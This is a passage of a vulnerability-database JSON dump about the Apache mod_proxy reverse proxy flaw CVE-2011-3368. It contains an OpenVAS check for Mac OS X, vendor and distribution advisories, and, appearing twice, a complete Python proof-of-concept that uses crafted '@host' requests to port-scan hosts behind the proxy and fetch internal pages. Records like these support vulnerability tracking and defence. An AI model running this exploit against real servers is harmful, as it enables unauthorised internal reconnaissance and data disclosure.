"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-26T15:08:45", "description": "This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2012-004.", "cvss3": {}, "published": "2012-09-25T00:00:00", "type": "openvas", "title": "Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3722", "CVE-2011-4317", "CVE-2012-2311", "CVE-2011-3026", "CVE-2012-2386", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-4599", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2688", "CVE-2011-3389", "CVE-2012-0053", "CVE-2012-0021", "CVE-2012-3720", "CVE-2011-3368", "CVE-2012-0670", "CVE-2012-3718", "CVE-2012-1667", "CVE-2012-0650", "CVE-2012-1172", "CVE-2011-3048", "CVE-2012-0671", "CVE-2012-1173", "CVE-2012-0831", "CVE-2012-0668", "CVE-2012-3719"], "modified": "2020-04-22T00:00:00", "id": "OPENVAS:1361412562310802968", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802968", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802968\");\n script_version(\"2020-04-22T10:27:30+0000\");\n script_cve_id(\"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2012-0650\",\n \"CVE-2012-1173\", \"CVE-2012-3719\", \"CVE-2012-0831\", \"CVE-2012-1172\",\n \"CVE-2012-1823\", \"CVE-2012-2143\", \"CVE-2012-2311\", \"CVE-2012-2386\",\n \"CVE-2012-2688\", \"CVE-2012-0671\", \"CVE-2012-0670\", \"CVE-2012-3722\",\n \"CVE-2012-0668\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\",\n \"CVE-2011-3026\", \"CVE-2011-3048\", \"CVE-2011-4599\", \"CVE-2011-3389\",\n \"CVE-2012-1667\", \"CVE-2012-3718\", \"CVE-2012-3720\");\n script_bugtraq_id(51705, 51407, 51706, 55623, 52891, 55623, 51954, 53403, 49778,\n 53388, 53729, 47545, 54638, 53584, 53582, 55612, 49957, 50494,\n 50802, 52049, 52830, 51006, 52830);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-22 10:27:30 +0000 (Wed, 22 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-09-25 19:33:16 +0530 (Tue, 25 Sep 2012)\");\n script_name(\"Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT5501\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/DL1586\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/50628/\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html\");\n\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.6\\.8\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to cause a buffer overflow,\n disclose potentially sensitive information or cause a DoS.\");\n script_tag(name:\"affected\", value:\"Apache\n BIND\n CoreText\n Data Security\n DirectoryService\n ImageIO\n Installer\n International Components for Unicode\n Kernel\n LoginWindow\n Mail\n Mobile Accounts\n PHP\n Profile Manager\n QuickLook\n QuickTime\n Ruby\n USB\");\n script_tag(name:\"insight\", value:\"Please see the references for more information on the vulnerabilities.\");\n script_tag(name:\"solution\", value:\"Run Mac Updates and update the Security Update 2012-004.\");\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2012-004.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"pkg-lib-macosx.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_is_equal(version:osVer, test_version:\"10.6.8\"))\n {\n if(isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2012.004\")){\n report = report_fixed_ver(installed_version:osVer, vulnerable_range:\"Equal to 10.6.8\");\n security_message(port:0, data:report);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache mod_proxy - Reverse Proxy Exposure", "edition": 2, "cvss3": {}, "published": "2011-10-11T00:00:00", "title": "Apache mod_proxy - Reverse Proxy Exposure", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-11T00:00:00", "id": "EXPLOITPACK:460143F0ACAE117DD79BD75EDFDA154B", "href": "", "sourceData": "#!/usr/bin/env python\n\nimport socket\nimport string\nimport getopt, sys\n\n\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\n\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\n\n\tget = \"GET \" + url + \"@\" + internal_target + \":\" + internal_port + \"/\" + resource + \" HTTP/1.1\\r\\n\"\n\tget = get + \"Host: \" + apache_target + \"\\r\\n\\r\\n\"\n\t\n\tremoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tremoteserver.settimeout(3)\n\n\ttry:\n\t\tremoteserver.connect((apache_target, int(apache_port)))\n\t\tremoteserver.send(get)\n\t\treturn remoteserver.recv(4096)\n\texcept:\n\t\treturn \"\"\n\ndef get_banner(result):\n\treturn result[string.find(result, \"\\r\\n\\r\\n\")+4:]\n\n\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\n\n\tprint_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\n\tfor port in tested_ports:\n\t\tport = str(port)\n\t\tresult = send_request(url, apache_target, apache_port, internal_target, port, resource)\n\t\tif string.find(result,\"HTTP/1.1 200\")!=-1 or \\\n\t\tstring.find(result,\"HTTP/1.1 30\")!=-1 or \\\n\t\tstring.find(result,\"HTTP/1.1 502\")!=-1:\n\t\t\tprint \"- Open port: \" + port + \"/TCP\"\n\t\t\tprint get_banner(result)\n\t\telif len(result)==0:\n\t \t\tprint \"- Filtered port: \" + port + \"/TCP\"\n\t\telse:\n\t \t\tprint \"- Closed port: \" + port + \"/TCP\"\n\t\t\t\n\ndef usage():\n\tprint\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\n\tprint \"http://www.secforce.co.uk\"\n\tprint\n\tprint \"usage():\"\n\tprint \"python apache_scan.py [options]\"\n\tprint\n\tprint \" [options]\"\n\tprint \"\t\t-r: Remote Apache host\"\n\tprint \"\t\t-p: Remote Apache port (default is 80)\"\n\tprint \"\t\t-u: URL on the remote web server (default is /)\"\n\tprint \"\t\t-d: Host in the DMZ (default is 127.0.0.1)\"\n\tprint \"\t\t-e: Port in the DMZ (enables 'single port scan')\"\n\tprint \"\t\t-g: GET request to the host in the DMZ (default is /)\"\n\tprint \"\t\t-h: Help page\"\n\tprint\n\tprint \"examples:\"\n\tprint \" - Port scan of the remote host\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif\"\n\tprint \" - Port scan of a host in the DMZ\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local\"\n\tprint \" - Retrieve a resource from a host in the DMZ\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html\"\n\tprint\n\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\n\tprint\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\n\tprint \"http://www.secforce.co.uk\"\n\tprint\n\tprint \" [+] Target: \" + apache_target\n\tprint \" [+] Target port: \" + apache_port\n\tprint \" [+] Internal host: \" + internal_target\n\tprint \" [+] Tested ports: \" + str(tested_ports)\n\tprint \" [+] Internal resource: \" + resource\n\tprint\n\n\ndef main():\n\n\tglobal apache_target\n\tglobal apache_port\n\tglobal url\n\tglobal internal_target\n\tglobal internal_port\n\tglobal resource\n\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"u:r:p:d:e:g:h\", [\"help\"])\n\texcept getopt.GetoptError:\n\t\tusage()\n\t\tsys.exit(2)\n\n\ttry:\n\t\tfor o, a in opts:\n\t\t\tif o in (\"-h\", \"--help\"):\n\t\t\t\tusage()\n\t\t\t\tsys.exit(2)\n\t\t\tif o == \"-u\":\n\t\t\t\turl=a\n\t\t\tif o == \"-r\":\n\t\t\t\tapache_target=a\n\t\t\tif o == \"-p\":\n\t\t\t\tapache_port=a\n\t\t\tif o == \"-d\":\n\t\t\t\tinternal_target = a\n\t\t\tif o == \"-e\":\n\t\t\t\tinternal_port=a\n\t\t\tif o == \"-g\":\n\t\t\t\tresource=a\t\t\t\t\n\t\t\n\texcept getopt.GetoptError:\n\t\tusage()\n\t\tsys.exit(2)\n\t\t\n\tif apache_target == \"\":\n\t\tusage()\n\t\tsys.exit(2)\n\n\nurl = \"/\"\napache_target = \"\"\napache_port = \"80\"\ninternal_target = \"127.0.0.1\"\ninternal_port = \"\"\nresource = \"/\"\n\nmain()\n\nif internal_port!=\"\":\n\ttested_ports = [internal_port]\nelse:\n\ttested_ports = known_ports\n\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T17:59:00", "description": "Bugtraq ID: 49957\r\nCVE ID\uff1aCVE-2011-3368\r\n\r\nApache HTTP Server\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684HTTPD\u670d\u52a1\u7a0b\u5e8f\u3002\r\nApache HTTP Server mod_proxy\u6a21\u5757\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u6076\u610f\u7528\u6237\u7ed5\u8fc7\u90e8\u5206\u5b89\u5168\u9650\u5236\u3002\r\n\u5f53mod_proxy\u6a21\u5757\u914d\u7f6e\u4ee5\u53cd\u5411\u4ee3\u7406\u6a21\u5f0f\u65f6\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\uff0c\u7531\u4e8e\u4e0d\u6b63\u786e\u5904\u7406\u90e8\u5206WEB\u8bf7\u6c42\uff0c\u653b\u51fb\u8005\u6784\u5efa\u7279\u5236\u7684URL\u53ef\u5411\u4ee3\u7406\u540e\u7684\u4e0d\u53ef\u671f\u670d\u52a1\u5668\u53d1\u9001\u6076\u610f\u8bf7\u6c42\u3002\r\n\u8981\u6210\u529f\u5229\u7528\u6f0f\u6d1e\u9700\u8981\u4f7f\u7528\u5177\u6709\u4e00\u5b9a\u7684\u6a21\u5f0f\u5339\u914d\u7684"ProxyPassMatch"\u548c"RewriteRule"\u914d\u7f6e\u547d\u4ee4\u3002\n\nApache 2.0.x\r\nApache 2.2.x\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u4f9b\u5e94\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\uff1a\r\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.2.21/CVE-2011-3368.patch", "cvss3": {}, "published": "2011-10-08T00:00:00", "title": "Apache HTTP Server 'mod_proxy'\u53cd\u5411\u4ee3\u7406\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20979", "id": "SSV:20979", "sourceData": "\n \u5982\u5982\u4e0b\u7684\u914d\u7f6e\uff1a\r\nRewriteRule (.*)\\.(jpg|gif|png) http://images.example.com$1.$2 [P]\r\nProxyPassMatch (.*)\\.(jpg|gif|png) http://images.example.com$1.$2\r\n\u53ef\u5bfc\u81f4\u6cc4\u9732\u5185\u90e8\u670d\u52a1\u5668\u4fe1\u606f\uff0c\u5982\u4e0b\u5f62\u5f0f\u7684\u8bf7\u6c42\uff1a\r\n GET @other.example.com/something.png HTTP/1.1\r\n \r\n\u4f1a\u8f6c\u8bd1\u6210\u5982\u4e0b\u7684\u76ee\u6807\u8bf7\u6c42\r\nhttp://images.example.com () other example com/something.png\r\n\u8fd9\u4f1a\u5bfc\u81f4\u4ee3\u7406\u8fde\u63a5"other.example.com"\uff0c\u56e0\u4e3a\u5f53\u89e3\u6790URL\u65f6"images.example.com@"\u6bb5\u4f1a\u4f5c\u4e3a\u7528\u6237\u9a8c\u8bc1\u51ed\u636e\u4f7f\u7528\u3002\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20979", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:58:49", "description": "No description provided by source.", "cvss3": {}, "published": "2011-10-12T00:00:00", "title": "Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20993", "id": "SSV:20993", "sourceData": "\n #!/usr/bin/env python\r\n \r\nimport socket\r\nimport string\r\nimport getopt, sys\r\n \r\n \r\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\r\n \r\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\r\n \r\n get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\\r\\n"\r\n get = get + "Host: " + apache_target + "\\r\\n\\r\\n"\r\n \r\n remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n remoteserver.settimeout(3)\r\n \r\n try:\r\n remoteserver.connect((apache_target, int(apache_port)))\r\n remoteserver.send(get)\r\n return remoteserver.recv(4096)\r\n except:\r\n return ""\r\n \r\ndef get_banner(result):\r\n return result[string.find(result, "\\r\\n\\r\\n")+4:]\r\n \r\n \r\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n \r\n print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n for port in tested_ports:\r\n port = str(port)\r\n result = send_request(url, apache_target, apache_port, internal_target, port, resource)\r\n if string.find(result,"HTTP/1.1 200")!=-1 or \\\r\n string.find(result,"HTTP/1.1 30")!=-1 or \\\r\n string.find(result,"HTTP/1.1 502")!=-1:\r\n print "- Open port: " + port + "/TCP"\r\n print get_banner(result)\r\n elif len(result)==0:\r\n print "- Filtered port: " + port + "/TCP"\r\n else:\r\n print "- Closed port: " + port + "/TCP"\r\n \r\n \r\ndef usage():\r\n print\r\n print "CVE-2011-3368 proof of concept by Rodrigo Marcos"\r\n print "http://www.secforce.co.uk"\r\n print\r\n print "usage():"\r\n print "python apache_scan.py [options]"\r\n print\r\n print " [options]"\r\n print " -r: Remote Apache host"\r\n print " -p: Remote Apache port (default is 80)"\r\n print " -u: URL on the remote web server (default is /)"\r\n print " -d: Host in the DMZ (default is 127.0.0.1)"\r\n print " -e: Port in the DMZ (enables 'single port scan')"\r\n print " -g: GET request to the host in the DMZ (default is /)"\r\n print " -h: Help page"\r\n print\r\n print "examples:"\r\n print " - Port scan of the remote host"\r\n print " python apache_scan.py -r www.example.com -u /images/test.gif"\r\n print " - Port scan of a host in the DMZ"\r\n print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"\r\n print " - Retrieve a resource from a host in the DMZ"\r\n print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"\r\n print\r\n \r\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n print\r\n print "CVE-2011-3368 proof of concept by Rodrigo Marcos"\r\n print "http://www.secforce.co.uk"\r\n print\r\n print " [+] Target: " + apache_target\r\n print " [+] Target port: " + apache_port\r\n print " [+] Internal host: " + internal_target\r\n print " [+] Tested ports: " + str(tested_ports)\r\n print " [+] Internal resource: " + resource\r\n print\r\n \r\n \r\ndef main():\r\n \r\n global apache_target\r\n global apache_port\r\n global url\r\n global internal_target\r\n global internal_port\r\n global resource\r\n \r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])\r\n except getopt.GetoptError:\r\n usage()\r\n sys.exit(2)\r\n \r\n try:\r\n for o, a in opts:\r\n if o in ("-h", "--help"):\r\n usage()\r\n sys.exit(2)\r\n if o == "-u":\r\n url=a\r\n if o == "-r":\r\n apache_target=a\r\n if o == "-p":\r\n apache_port=a\r\n if o == "-d":\r\n internal_target = a\r\n if o == "-e":\r\n internal_port=a\r\n if o == "-g":\r\n resource=a \r\n \r\n except getopt.GetoptError:\r\n usage()\r\n sys.exit(2)\r\n \r\n if apache_target == "":\r\n usage()\r\n sys.exit(2)\r\n \r\n \r\nurl = "/"\r\napache_target = ""\r\napache_port = "80"\r\ninternal_target = "127.0.0.1"\r\ninternal_port = ""\r\nresource = "/"\r\n \r\nmain()\r\n \r\nif internal_port!="":\r\n tested_ports = [internal_port]\r\nelse:\r\n tested_ports = known_ports\r\n \r\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20993", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:59:00", "description": "No description provided by source.", "cvss3": {}, "published": "2011-10-06T00:00:00", "title": "Apache mod_proxy Reverse Proxy Exposure", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20969", "id": "SSV:20969", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nApache HTTP Server Security Advisory\r\n====================================\r\n\r\nTitle: mod_proxy reverse proxy exposure\r\n\r\nCVE: CVE-2011-3368\r\nDate: 20111005\r\nProduct: Apache HTTP Server\r\nVersions: httpd 1.3 all versions, httpd 2.x all versions\r\n\r\nDescription:\r\n============\r\n\r\nAn exposure was reported affecting the use of Apache HTTP Server in\r\nreverse proxy mode. We would like to thank Context Information\r\nSecurity Ltd for reporting this issue to us.\r\n\r\nWhen using the RewriteRule or ProxyPassMatch directives to configure a\r\nreverse proxy using a pattern match, it is possible to inadvertently\r\nexpose internal servers to remote users who send carefully crafted\r\nrequests. The server did not validate that the input to the pattern\r\nmatch was a valid path string, so a pattern could expand to an\r\nunintended target URL.\r\n\r\nFor future releases of the Apache HTTP Server, the software will\r\nvalidate the request URI, correcting this specific vulnerability. The\r\ndocumentation has been updated to reflect the more general risks with\r\npattern matching in a reverse proxy configuration.\r\n\r\nDetails:\r\n========\r\n\r\nA configuration like one of the following examples:\r\n\r\n RewriteRule (.*)\\.(jpg|gif|png) http://images.example.com$1.$2 [P]\r\n ProxyPassMatch (.*)\\.(jpg|gif|png) http://images.example.com$1.$2\r\n\r\ncould result in an exposure of internal servers. A request of the form:\r\n\r\n GET @other.example.com/something.png HTTP/1.1\r\n\r\nwould get translated to a target of:\r\n\r\n http://images.example.com@other.example.com/something.png\r\n\r\nThis will cause the proxy to connect to the hostname\r\n"other.example.com", as the "images.example.com@" segment would be\r\ntreated as user credentials when parsing the URL. This would allow a\r\nremote attacker the ability to proxy to hosts other than those\r\nexpected, which could be a security exposure in some circumstances.\r\n\r\nThe request-URI string in this example,\r\n"@other.example.com/something.png", is not valid according to the HTTP\r\nspecification, since it neither an absolute URI\r\n("http://example.com/path") nor an absolute path ("/path"). For\r\nfuture releases, the server has been patched to reject such requests,\r\ninstead returning a "400 Bad Request" error.\r\n\r\nActions:\r\n========\r\n\r\nApache HTTPD users should examine their configuration files to determine \r\nif they have used an insecure configuration for reverse proxying. \r\nAffected users can update their configuration, or apply the patch from:\r\n\r\n http://www.apache.org/dist/httpd/patches/apply_to_2.2.21/\r\n\r\nFor example, the above RewriteRule could be changed to:\r\n\r\n RewriteRule /(.*)\\.(jpg|gif|png) http://images.example.com/$1.$2 [P]\r\n\r\nto ensure the pattern only matches against paths with a leading "/".\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk6MZZAACgkQR/aWnQ5EzwxdfQCg0yX+OplatMPQcweRneRmh5Xp\r\n5sEAoLooi9H4LW12oPgStNbY2wtyQrYP\r\n=8qjg\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20969", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "httpd": [{"lastseen": "2021-07-28T15:48:19", "description": "An exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker. No update of 1.3 will be released.\nPatches will be published to https://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/", "cvss3": {}, "published": "2011-09-16T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.0.65 : mod_proxy reverse proxy exposure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2013-07-22T00:00:00", "id": "HTTPD:957760910D8CC358871C30AD5A1D2A5F", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T15:48:19", "description": "An exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker. No update of 1.3 will be released.\nPatches will be published to https://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/", "cvss3": {}, "published": "2011-09-16T00:00:00", "type": "httpd", "title": "Apache Httpd < 1.3-never : mod_proxy reverse proxy exposure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2011-09-16T00:00:00", "id": "HTTPD:251E9EE30116844024950699040C983B", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T15:48:19", "description": "An exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker. No update of 1.3 will be released.\nPatches will be published to https://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/", "cvss3": {}, "published": "2011-09-16T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.2.22 : mod_proxy reverse proxy exposure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2012-01-31T00:00:00", "id": "HTTPD:1DC50F4C723B9143E9713B27031C6043", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:56:15", "description": "The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x\nthrough 2.0.64, and 2.2.x through 2.2.21 does not properly interact with\nuse of (1) RewriteRule and (2) ProxyPassMatch pattern matches for\nconfiguration of a reverse proxy, which allows remote attackers to send\nrequests to intranet servers via a malformed URI containing an initial @\n(at sign) character.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3368>\n * <https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/877740>\n * <https://bugzilla.novell.com/show_bug.cgi?id=722545>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | Per Novell BTS (comment #16), the proposed fix is incomplete for 0.9 http requests.\n", "cvss3": {}, "published": "2011-10-05T00:00:00", "type": "ubuntucve", "title": "CVE-2011-3368", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-05T00:00:00", "id": "UB:CVE-2011-3368", "href": "https://ubuntu.com/security/CVE-2011-3368", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:31:57", "description": "An information disclosure vulnerability has been reported in Apache httpd server. The vulnerability is due to insufficient input validation by the server while using the RewriteRule or ProxyPassMatch directives. A remote attacker may exploit this vulnerability by sending a series of specially crafted requests to an affected httpd server. Successful exploitation would allow an attacker to read data which was not intended to be disclosed from the server.", "cvss3": {}, "published": "2011-11-01T00:00:00", "type": "checkpoint_advisories", "title": "Apache HTTPD mod_proxy Information Disclosure (CVE-2011-3368)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2011-11-01T00:00:00", "id": "CPAI-2011-483", "href": "", "cvss": {"score": 